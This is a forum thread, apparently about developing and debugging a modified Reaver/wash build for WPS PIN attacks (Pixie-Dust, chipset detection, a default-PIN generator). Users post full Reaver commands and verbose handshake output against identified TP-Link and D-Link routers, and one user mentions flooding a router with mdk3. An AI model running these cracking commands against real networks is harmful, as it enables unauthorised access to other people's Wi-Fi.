[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin, wait ...
Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

[Reaver Test] BSSID: 8C:09:00:11:00:11
[Reaver Test] Channel: 9
hangs there

nuroo

try with a fixed channel, the reaver is trying to get the psk, but if the reaver not able to complete the task he is in this loop until get, if the router is far away the reaver it difficult to get up to the final stage

better I put a timeout, tomorrow will make the bug fix


And sorry for the credits hahaha

It would be a good he already try all the Ks, I'll think of something.

thank you again

Option -g released in the wash


-g, --get-chipset Output Piped and tries to read the chipset with reaver

Example


# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

Another idea... have all the extra stuff print only with verbosity mode selected :D
-v -vv -vvv maby? :)


Update: I'm getting a segmentation fault when I use -K 1 and -K 3


Segmentation fault
I also receive segmentation fault error too...

-v -vv -vvv maby? :)


I also receive segmentation fault error too...

any router? or some router in specific?

Thx t6x!


-v -vv -vvv maby? :)

yesss. That. Keep different functions/improvement separated.

In my orginal reaver command, I did not specify a channel on purpose, to troubleshoot. But your code for reaver part2 - passphrase puts -channel automatic -NICE!
[Pixie-Dust]
PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
[Pixie-Dust] [+] WPS pin: 50..........
[Pixie-Dust]
[Pixie-Dust]
Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin, wait ...
Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

[Reaver Test] BSSID: 8C:09:00:11:00:11
[Reaver Test] Channel: 9

I guess the AP just so to far away like u said.

The -g option in wash for chipset excellent idea. Better to pick targets. Can't wait to try it later.

is this version of reaver compatible with wps version 00? because i tryed this on TP-LINK TD-W8961ND and it always get stock in M2 after getting PKr and wps get disabled i have to DDos the router with Mdk3 to activate wps again 543

it's wierd i got the same Pkr when i tryed Reaver on TP-LINK TD-W8961ND the only problem is Reaver always get stock at M2 so i didnt AuthKe,E-Hash1 and E-Hash2

I love the -g option. Just tried it. This is a great idea.

Your right it does need a timer and or -rssi strength filter.

Or maybe each access point is independent process so wash can move on to next AP, maybe display something like waiting...... until response recieved. (but i'm not coder, maybe to much work)

00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


Also
-P option on purpose have no header, so it can be small in terminal window?

BSSID Channel RSSI WPS Version WPS Locked ESSID
-------------------------------------------------------------------------------------------

This can be done, but I have to think of a more general way to create the function a little better.

There are certain things running on a linux but not working in an embedded, I try to come up with something that works cool.

I tried to add this option to facilitate the search time, but this problem of taking too long to be annoyed too

What complicates the operation is that it is necessary to make requests to the router so that it responds with all the necessary data.

When the router is far away, just that it takes a while to get up to get the message M1 and sometimes not even pass the authentication is because of this that is stopped on the screen waiting.

At this point it would be interesting to create multithreaded functions, but must do so in a way that works on all devices, it would not be interesting reworking code for each platform.

DataHead think that soon will make portability for bigendian and thus left open for OpenWRT and variants.


With relation to the header, I tried to create this function to help people that creates scripts or frontends, it is easier to treat a result already relatively more processed.


There comes a time that is difficult to decide what to do, are many options and many variations.

have to remember that everyone is free to help

Yep ideas are the easy part.
<////////#~~~~~~

http://www48.zippyshare.com/v/fac5FdEV/file.html



http://www48.zippyshare.com/v/aJAXnDmL/file.html
TP link :@

New update

reaver -W option


-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link


Example



[P] E-Nonce: 27:63:ad:1f:d1:10:.......
[P] PKE: 2f:4e:e4:10:dd:0b:0e:7e:1e:27:b9:......
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: ....
[P] WPS Model Serial Number: ......
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 25657371

Do you know something about the bug with repeating this pin 99985677 ? I tried to brute-force one D-LINK 501 but with this bug i can't. I see that other users have the same bug.

https://code.google.com/p/reaver-wps/issues/detail?id=614

Paste the reaver result

Which result ? You want the result with hashes ? I mention the bug, because you update the reaver with new things and ...

Which result ? You want the result with hashes ? I mention the bug, because you update the reaver with new things and ...

The link that you gave me it is not clear what is happening.

It is hard I analyze the problem without having a router that has this defect, you tried to work with the options -1 and -2 to set the pin in a different position this?

No. I tried before 3-4 months ago with classic method - collect pins. https://www.google.bg/#q=99985677+pin+loop

please if possible give as method to add more router and thanks

Hello !
I've just tryed -W option with TP-Link router and it gives me pin:

root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -W2

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 6
[?] Restore previous session for F8:D1:11:46:60:92? [n/Y] n
[+] Waiting for beacon from F8:D1:11:46:60:92
[+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7e:4b:d4:27:6f:5b:1b:96:92:68:ab:da:0c:0d:c1:04
[P] PKE: 30:f4:ec:68:2c:eb:11:63:91:96:11:c9:84:b1:8b:4b:9b :72:44:47:c9:14:6a:52:04:c3:a5:eb:8d:73:0c:6b:e0:4 6:2f:09:84:89:64:95:a8:40:e5:61:68:d9:6f:86:13:a1: 6d:a9:e0:65:08:40:2a:4e:79:b2:3d:fe:2e:09:e3:f0:de :02:bc:0e:01:21:37:15:22:c6:58:df:50:59:ae:ba:4b:2 8:cc:c3:ca:c8:67:9a:6b:1b:1b:a5:c8:2c:0e:0c:10:d6: fb:03:8d:5a:55:8c:57:e3:f8:b9:06:5c:af:c5:0b:47:8b :68:e5:6b:ba:3b:e4:a6:a0:5a:2b:6f:69:a3:7b:14:99:3 0:da:96:a6:23:fc:6e:9f:a7:5d:bc:43:2d:00:75:38:b4: 3e:04:69:6f:25:0a:fb:a0:fd:04:46:a4:ed:f8:2e:f5:b6 :e5:82:6c:08:5c:8b:b0:ea:da:6d:96:3b:af:40:ec:c2:8 0:87:d4:36:e7:5d:43:1e:de
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 66021674

But this pin is wrong :(


root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -p 66021674

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 6
[+] Waiting for beacon from F8:D1:11:46:60:92
[+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 66021674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 03:15:f3:fd:c4:d0:28:66:d9:b5:44:89:18:5d:76:90
[P] PKE: fe:b2:9b:4c:0f:f0:b7:93:07:49:94:cd:8e:27:e7:66:a9 :82:c5:b1:3e:57:db:10:b6:bc:7b:b5:b9:e1:a8:f1:95:2 8:79:0a:90:18:54:8e:f1:ed:9e:cf:36:c6:85:3e:16:54: 66:f5:fc:e0:a7:75:d8:f9:70:3d:99:28:a2:49:73:dc:56 :19:2b:9d:77:72:d8:47:f8:dc:d8:15:52:92:e4:3a:cd:b b:c0:c2:ff:6e:ed:a7:ed:b5:c8:3b:ee:7f:db:e2:74:7b: 48:73:9a:5d:e9:26:a8:44:6e:79:43:c4:27:31:ed:5e:3b :96:19:d1:95:8a:47:0e:7a:52:b9:72:2c:bb:44:1a:d1:1 d:4c:3f:cc:e4:d5:36:03:5f:68:65:b7:ba:c3:c3:6a:4f: a0:7a:d1:3f:32:23:2a:98:fb:11:24:e2:3b:0a:8d:29:f8 :87:87:7d:4c:30:5c:06:1d:31:41:53:71:46:5c:fc:e9:9 a:fa:1c:34:50:5b:7d:af:ec
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: fa:7d:f6:ff:8d:08:af:de:0e:06:8f:c3:e6:9e:bb:b7:57 :7b:49:a8:cb:fd:e9:0f:ee:40:91:ae:94:3c:86:67
[+] Sending M2 message
[P] E-Hash1: c9:44:26:f8:b0:91:05:54:a8:e7:fb:e4:db:14:94:14:5a :c7:7b:d6:8a:dd:4c:f6:74:9c:9b:c5:86:4e:2b:23
[P] E-Hash2: 4a:3a:e9:db:9d:2d:e5:d7:6d:d9:61:df:67:b4:5f:08:99 :17:4a:0d:ca:90:e4:54:ff:60:d4:02:be:9e:fd:e8
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 66021674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f4:c4:53:ae:77:33:76:ca:4e:38:

For other TP-Link router the same situation:

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -S -W2 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: e9:d9:8c:79:f4:66:03:df:31:b3:c7:b0:da:2d:ad:42
[P] PKE: 5f:3e:5a:21:2f:ad:2b:49:d9:bf:52:1a:eb:e4:a0:b9:f6 :57:30:8e:58:12:d0:57:45:70:b3:d6:d5:87:43:a0:82:4 e:5d:c1:46:d7:3f:86:54:b9:fe:c3:5a:c2:08:cc:a2:94: c5:ef:72:4b:0e:b9:d7:20:85:cc:60:72:34:35:10:41:8d :c0:46:4b:cd:13:a5:ce:66:b7:b8:e6:62:3a:af:3f:bc:c d:d4:5d:4e:8d:01:2c:16:fc:20:0c:d0:3a:93:e5:ef:dd: a9:f8:37:83:6b:08:6e:c8:60:92:be:68:14:e9:bd:a5:21 :fa:80:ef:4c:cd:64:f4:6d:ee:59:98:f2:4f:fa:83:77:2 9:38:27:21:7f:12:00:89:f8:9e:f7:c4:81:83:5e:e8:e5: 50:8d:07:b9:3b:f1:e5:84:a9:d0:35:8e:aa:ad:d8:aa:08 :10:94:ba:2d:93:88:e9:95:ef:f4:d4:22:a2:f5:bb:fd:b 3:f1:40:dc:c9:fc:0c:ce:eb
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 23276079

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -W2 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:b4:31:9b:fa:fd:7c:69:18:2d:d6:67:61:67:39:d7
[P] PKE: 81:a3:87:a9:28:b7:7c:31:e9:bf:84:60:a0:33:2c:45:5a :aa:d2:9c:91:4c:64:cf:da:90:3b:97:21:84:9d:d5:d2:4 d:f6:df:68:73:ab:09:70:e4:d8:3c:0e:3b:75:c8:39:5a: 60:ba:bd:2e:19:88:cf:cb:8a:ba:50:62:55:51:6b:b9:79 :95:29:87:fc:5c:68:7f:ef:ba:d5:58:8a:2f:e3:b7:0e:d c:86:52:f6:45:7d:1a:f7:dc:ee:02:25:1a:1e:89:1c:8a: 54:6f:22:d7:10:62:14:13:6e:6a:be:bd:c4:d2:95:99:c1 :48:9d:0f:0e:17:6c:b5:ff:73:a9:bc:56:fa:4c:db:4d:c 5:da:23:3f:9a:3f:cf:a1:0b:cc:70:d1:e3:87:ab:e8:7f: 5b:14:a0:b1:60:3f:97:8d:af:c6:ea:58:0b:27:e6:20:6e :b9:ab:a1:4b:08:76:1a:33:b0:0b:65:1d:1e:20:0b:21:3 8:ab:a1:39:77:3a:c2:05:96
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 23276079

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -p 23276079 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 23276079.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: cd:0b:6e:a2:32:b5:73:f8:0a:6c:a7:db:f3:e8:b7:3d
[P] PKE: 8b:c9:c8:4b:61:5a:88:87:b3:7b:b3:5b:95:91:7c:f8:59 :11:85:b1:b7:4a:58:c9:7d:d5:c6:45:44:30:9c:b1:1c:2 e:d2:85:88:93:86:1c:21:25:e9:d5:4b:29:38:f5:76:b9: 9c:43:a4:31:fc:01:82:fb:49:18:3f:1d:0f:90:02:2b:29 :9e:24:bb:6d:b0:22:75:50:4d:52:4b:88:3e:47:7a:42:b c:6a:2d:1d:18:6c:7d:98:41:07:c8:44:6d:ee:b6:07:09: b4:9e:89:a2:48:11:2f:d4:ac:aa:be:bc:f4:10:b0:db:f5 :ac:fe:0c:3f:20:62:63:d7:f4:82:61:4e:8a:6d:63:53:b b:63:fa:f6:3b:f3:6d:97:e9:8a:9a:21:35:e4:96:09:ae: 5b:db:79:15:49:bb:aa:f0:71:fc:91:b4:58:82:4c:07:95 :7e:5e:c8:d3:e7:d2:c1:d9:3f:3f:19:9e:b1:4d:b0:a2:e a:af:9d:6f:b1:97:ac:b5:a4
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: c7:2f:8a:a2:10:12:d9:d2:05:61:3c:a6:7a:20:80:b3:56 :20:39:d9:a3:d7:a3:69:8a:c9:90:d3:6b:da:b4:8b:3e:a f:6e:02:3b:7d:b6:99:8c:d1:48:c5:28:62:36:b1:c3:86: ef:75:95:ed:81:f4:f7:4f:8e:d8:b8:88:9c:f9:fe:fa:14 :da:52:9d:a4:08:1a:c1:e6:ad:e6:e2:85:2d:e5:fc:e6:e f:8f:ae:05:02:b5:34:d2:4e:01:ff:49:01:c6:db:56:75: f7:05:9d:e1:22:f9:63:03:a5:2e:5e:da:e9:45:fe:6d:1b :b5:dc:a3:4b:93:9c:c8:63:44:9b:8e:7f:18:2a:21:df:b c:b9:a6:b2:42:ae:42:ca:89:59:f3:c5:c4:26:ed:b9:c5: 95:d5:5e:26:be:8f:ae:b6:8c:09:8f:32:68:a5:b7:c3:50 :fb:72:57:e4:db:99:57:ca:5b:e6:5e:82:94:7e:46:31:d b:ac:70:33:36:a7:70:f1:cc
[P] AuthKey: ce:03:54:4f:95:88:fd:73:eb:95:00:8d:3e:d6:4f:2d:f3 :c8:55:69:84:c3:b6:25:6e:c5:4d:38:b4:7d:b6:eb
[+] Sending M2 message
[P] E-Hash1: 31:59:76:88:83:d2:4d:62:7d:9b:6c:f8:2d:d7:0a:66:31 :ae:ed:a5:ca:de:5f:d1:17:ef:7a:a2:f0:4c:47:24
[P] E-Hash2: 34:c6:ed:b1:2d:bf:07:ab:a2:4b:2d:2c:2d:5f:73:98:95 :06:30:96:eb:eb:16:79:ef:a2:1f:10:79:c8:63:32
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 23276079.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

So, what is wrong maybe i'm using -W opt incorrect ?

Hello
So, what is wrong maybe i'm using -W opt incorrect ?

Well, it just might be the fact that you're using a D-Link generator for a TP-Link AP... but no, that can't be!:confused:

[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 66021674

You realize that the -W option works for two types of routers? D-Link and Belkin, and only for some models of these companies?
You are trying to use the D-Link generator on a router TP-Link?

I think this is not being done properly

In own output is written D-Link, please a little more attention

sorry, i was too much obvious. Thank you for explanation and your work! I found only 1 D-Link router but it gave me the same problem. I believe it's one of "some models of these companies" which are protected.
I was trying both W2 and W1:

reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -S -W2

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: e4:bc:d7:2b:75:a4:10:45:54:d4:69:98:e7:fe:a0:e6
[P] PKE: 57:09:eb:12:09:28:f1:e3:68:0f:21:fe:d8:9f:b4:15:21 :31:4e:92:b9:70:55:e1:cd:59:7c:3d:c9:fc:fc:58:68:0 a:60:9b:26:52:12:05:f5:17:c1:a7:a0:98:bf:40:f5:2e: 8f:c1:ba:3c:bc:8b:78:d4:e5:9a:74:1b:8c:72:43:e4:a4 :ed:1d:bf:00:dd:e8:39:14:c6:20:ea:57:09:8e:cc:b0:d 8:fb:02:ba:71:c1:b2:ed:0a:e2:90:f3:ef:bd:1f:5a:77: 59:58:52:83:3a:ec:6d:09:06:0f:1d:a9:0c:e2:7e:3e:91 :35:5e:55:ac:29:4e:e3:11:59:9d:62:da:e5:fb:e7:61:9 a:8d:3e:cb:d8:f1:cd:36:b2:29:91:e7:9e:46:79:9e:52: 9d:d5:77:4a:43:ab:7d:87:ad:b9:d4:c9:82:19:5f:e0:7f :5a:ee:a3:48:5d:04:43:4b:b2:05:e4:4e:e8:9d:ca:f4:1 3:6d:d4:06:1b:88:9f:2b:75
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 69130571

root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 69130571

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 69130571.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1e:80:8f:8d:00:49:27:e8:34:c8:02:f1:be:6c:17:06
[P] PKE: 21:2c:e8:59:ca:7a:60:38:b2:4e:29:6a:a3:7e:58:d2:a5 :df:89:03:a8:78:e6:27:39:1e:69:46:62:ba:af:af:d5:a 0:1d:11:36:6a:c9:02:d8:23:a5:28:b3:69:f2:39:db:5e: 2f:cc:0c:f4:81:29:64:1d:e7:f4:7f:62:c8:79:4a:dd:3b :ed:5d:e0:fd:08:66:2b:e3:02:24:3a:2d:35:48:4e:3e:d 7:af:d2:8f:18:ba:50:eb:24:e0:5a:03:82:90:69:c1:a1: af:a3:bf:1c:5d:1b:54:48:5e:5b:61:06:1a:1f:54:b5:67 :da:6a:e0:04:44:6a:f2:c0:2f:58:6d:4c:f7:a7:b3:ce:a 3:dd:d4:ca:4a:fd:e5:ad:a7:c6:c3:e9:8f:f2:9b:97:f1: f5:9e:a4:07:8c:12:fe:ea:35:47:ee:cc:4e:8f:f0:64:6c :a7:7a:c7:6a:84:0f:ea:e8:77:76:e3:89:21:ba:4f:08:5 6:33:62:78:cf:1d:6c:57:7d
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: ab:c9:36:63:de:53:66:02:df:77:ae:85:a1:aa:90:61:f3 :a0:7e:fd:0b:ba:68:e0:13:5b:70:10:66:46:6b:eb:26:d 3:33:43:fa:0d:82:f2:b4:88:f6:8c:02:fb:0b:07:76:5c: 06:8c:eb:36:b8:fd:7f:7e:ce:19:18:77:dd:24:e4:30:62 :42:6f:a9:27:3c:dc:8d:1f:36:5c:c1:43:e3:23:c7:ba:c 4:48:a9:c4:d8:a7:0a:64:2a:2c:0b:0d:8f:d7:5c:7f:d9: 22:f5:8c:3b:50:42:17:fe:56:71:4a:ff:75:d2:18:df:44 :0d:6f:ce:87:3c:38:77:f8:f1:09:39:8f:cc:ba:75:67:1 1:20:a2:bd:99:25:fe:62:ac:5b:9d:97:71:2f:96:7f:0e: da:44:3f:bd:62:9c:e4:53:d7:81:21:64:79:a0:46:6d:36 :18:ec:77:57:43:6d:c4:d2:d3:43:e0:38:f6:4e:ae:5c:c c:ae:4c:d6:31:a5:68:cc:84
[P] AuthKey: dc:c0:e9:e9:e2:13:b4:81:d5:92:e6:b7:b8:7e:0e:e0:29 :49:6e:eb:9a:95:7f:9e:05:92:48:3e:38:2a:86:3a
[+] Sending M2 message
[P] E-Hash1: 2c:08:61:26:58:76:5d:f6:ee:59:d9:7a:32:43:b8:f9:1f :05:3c:a4:cc:f6:22:3a:24:c8:9c:e2:ef:df:3a:52
[P] E-Hash2: 0e:3a:b4:d2:93:21:91:5e:66:3b:f4:e6:13:db:40:87:b9 :fd:80:0b:2b:fa:87:37:fb:5d:41:67:21:38:aa:61
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 69130571.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.
root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -W1 -S

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 88:f6:3a:26:77:59:5d:b7:f9:07:f7:16:4b:6a:1c:af
[P] PKE: 9b:17:58:e6:f5:d8:bf:6e:b2:c7:4c:b3:b4:33:06:66:c2 :1c:fa:0b:ae:a2:77:c2:25:64:1f:3f:cc:61:98:07:1f:b f:90:7c:bc:2f:c3:c0:f9:6b:07:77:bb:5c:58:18:e5:80: 22:41:2c:28:77:d5:21:30:9f:37:70:94:aa:36:b4:dd:82 :50:0d:28:b0:12:c3:cd:42:a8:d1:76:9b:90:4d:e9:a7:4 e:52:4e:27:c4:92:39:af:31:4a:99:9e:33:ca:76:c6:a1: 05:67:8f:87:ca:fc:6f:92:d7:47:99:4f:86:0d:a7:3c:7c :b2:b7:cc:6a:fc:a1:d8:81:0e:a8:c3:79:99:a7:c7:cb:0 1:94:dc:5c:ac:15:3f:25:22:85:47:6b:81:30:bf:aa:f5: d2:ab:ac:5a:b0:72:13:0b:85:97:02:15:70:11:0e:ce:49 :16:43:a9:d3:23:89:6b:5e:cf:99:63:9a:bb:b4:e0:1f:3 b:83:6e:f7:ff:72:e4:36:d5
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[Pin Gen] Belkin Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 95278582

root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 95278582

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 95278582.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: ff:94:71:b4:2c:c9:c9:f7:58:84:92:e0:5c:f4:76:ee
[P] PKE: 57:c6:10:df:65:ef:bc:3b:d4:f0:04:9c:ad:01:05:58:ff :67:c5:31:67:16:f5:bf:6d:0e:13:2e:b2:87:f9:a3:12:1 d:bb:3b:79:be:6a:34:eb:e2:2d:3f:92:65:56:57:87:9a: b6:7b:0f:59:ba:d0:b3:28:1f:97:56:50:03:f0:1e:a8:68 :f9:6f:23:f7:81:98:10:de:9a:88:c6:39:36:78:62:ae:8 6:29:c0:d7:a3:b4:93:2c:34:b5:d1:a0:7f:a0:de:16:59: 67:d8:82:93:e9:79:77:23:3a:19:b8:7f:e6:c8:c6:15:33 :c7:2a:c2:82:c6:2a:64:e9:98:3e:26:47:1a:b5:96:68:e e:bd:80:4c:ba:8e:ff:2f:94:e9:b2:fd:6a:89:e1:a8:59: f1:c6:8c:00:cb:1e:ac:ca:87:e1:f8:88:9a:fb:36:26:31 :90:86:ee:2c:81:40:71:d0:e8:2d:f0:37:25:73:ff:e6:5 6:ee:7f:1c:d2:03:8a:3b:97
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 73:ff:53:78:47:21:ee:d6:b8:90:4f:4f:bf:14:d6:7a:80 :f8:b0:60:d7:45:9e:ca:96:a4:ca:d1:e5:09:5e:d1:14:6 8:2d:78:45:e1:f8:28:39:54:13:2a:8f:c5:e0:8d:9e:02: cb:78:85:7d:e3:71:c4:34:91:ef:19:dc:e6:47:10:1e:b7 :ec:08:a7:2a:6a:f2:b1:52:ab:43:f0:ce:0e:cb:68:30:d 7:14:12:5d:6f:d0:0a:16:ad:65:ff:1f:6f:80:22:d8:70: 87:1f:2f:65:de:af:63:b1:92:1d:20:e2:a1:6a:db:4b:59 :4d:fc:ea:e0:e0:d7:53:4f:b2:57:7e:58:e5:d1:f5:38:4 c:a4:35:b0:77:dc:72:1f:c1:49:a6:62:aa:83:4c:52:69: 77:64:5a:52:7d:55:d4:79:6d:5b:fd:31:29:66:bc:0a:27 :00:f0:1d:78:13:af:c8:62:10:18:84:30:59:65:d4:56:f 2:14:9c:25:21:ed:7f:7d:93
[P] AuthKey: eb:19:49:07:2c:05:08:68:49:1f:e1:03:71:fa:31:02:0e :e8:d2:6c:38:93:77:87:58:b1:5c:79:16:3f:f0:a3
[+] Sending M2 message
